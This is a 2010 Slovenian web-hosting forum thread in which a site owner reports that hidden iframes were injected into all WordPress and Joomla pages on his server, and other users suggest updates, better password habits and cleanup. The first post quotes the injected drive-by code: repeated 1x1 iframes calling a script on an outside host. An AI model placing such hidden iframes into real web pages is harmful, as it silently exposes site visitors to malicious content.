| vdor na strežnik - supergreenhosting | ||
|---|---|---|
|
bostjan-
3. dec 2010 13:45:53
Pridružen od: 6. nov 2009 303 objav 155 10 3 |
#1
Pozdrav. Včeraj mi google webmaster tools javil, da se je na eni WP strani pojavila nevarna vsebina, danes mal čekiram in vidim, da se je na vseh straneh na tem strežniku (wordpress in joomla) pojavila naslednja koda: <iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe><iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe><iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe><iframe width="1" height="1" src="http://guwtron.com/gizmod/start.php?id=vlnd"></iframe> s tem problemom se prvič soočam, tako da kaj je za narediti v tem primeru? na support od super green hostinga sm že pisal, spremenil sm kode oz jih še spreminjam. kaj je še za narediti preden google pošlje v banovce vse moje strani? a kodo se fizično odstrani z vseh strani al kako? hvala vsem za odgovore.. |
|
|
urbee
3. dec 2010 14:17:16
Pridružen od: 18. maj 2008 1365 objav 1642 211 84 |
||
|
bostjan-
3. dec 2010 14:23:14
Pridružen od: 6. nov 2009 303 objav 155 10 3 |
#3
tole so mi poslali s supporta: If your website has been hacked then I advise you to do following: It should solve the issue. sej u WPji je sam u index.php 2 vrstici te kode, tako da bo šlo hitro, čeprav mam mal težav z dostopom do admina, za joomlo bom pa še pogledal. kako lahko še zaščitim server u cpaneli razen da spremenim geslo? |
|
|
frorchy
3. dec 2010 14:32:06
Pridružen od: 16. jan 2009 1266 objav 1052 176 50 |
GostovanjeHostgator | Gostovanje in Free DomenaFatCow - 47% OFF
|
|
|
perunpro
3. dec 2010 14:40:06
Pridružen od: 23. maj 2008 3360 objav 2892 217 19 |
||
|
bostjan-
3. dec 2010 14:49:02
Pridružen od: 6. nov 2009 303 objav 155 10 3 |
||
|
Gogy
3. dec 2010 14:57:15
Pridružen od: 17. mar 2007 2491 objav 2064 252 12 |
#7
Si pozabil kaj nadgraditi na zadnjo verzijo? Imaš morda na kakem od njih default username in password? |
|
|
bostjan-
3. dec 2010 15:05:36
Pridružen od: 6. nov 2009 303 objav 155 10 3 |
#8
wordpressa nisem imel zadnje verzije na vseh straneh, sedaj sem updejtal. default imen in gesel nimam, uporabljam pa več ali manj podobna gesla. sem se pa poleti udeležil 30dc channel in osnovno stran na strežniku sem naredil preko wordpress directa, kamor sem vpisal tudi podatke za ftp dostop do strežnika, da je lahko naložil stran gor. zanimivo pa je, da mi ravno zadnje dni pošiljajo iz WP directa, da se trial mode izteka in ravno včeraj, ko je prišlo do tega, se je WP direct trial mode tudi dokončno iztekel... le naklučje? |
|
|
Gogy
3. dec 2010 21:32:33
Pridružen od: 17. mar 2007 2491 objav 2064 252 12 |
||
|
jondoe
4. dec 2010 10:53:23
Pridružen od: 27. jun 2010 57 objav 37 1 0 |
#10
Meni se je lani nekaj podobnega zgodilo. Imel sem shranjeno ftp geslo v Firefoxu za FireFTP. Najverjetneje sem dobil en virus, ki mi je prebral shranjeno ftp geslo in poslal ftp geslo nepridipravom, ki so se nato z boti prijavili z mojim geslom in mi v vse index.php datoteke dodali iframe na ruske strani. To sem videl iz ftp loga, kjer je bilo polno različnih ruskih IP-jev, ki so se prijavljali z mojim geslom. Po tej izkušnji nikoli več ne shranjujem pomembnejših gesel (ftp, banka, paypal...) v programe, ampak jih vedno ročno vnesem ob vsakokratni uporabi. |
|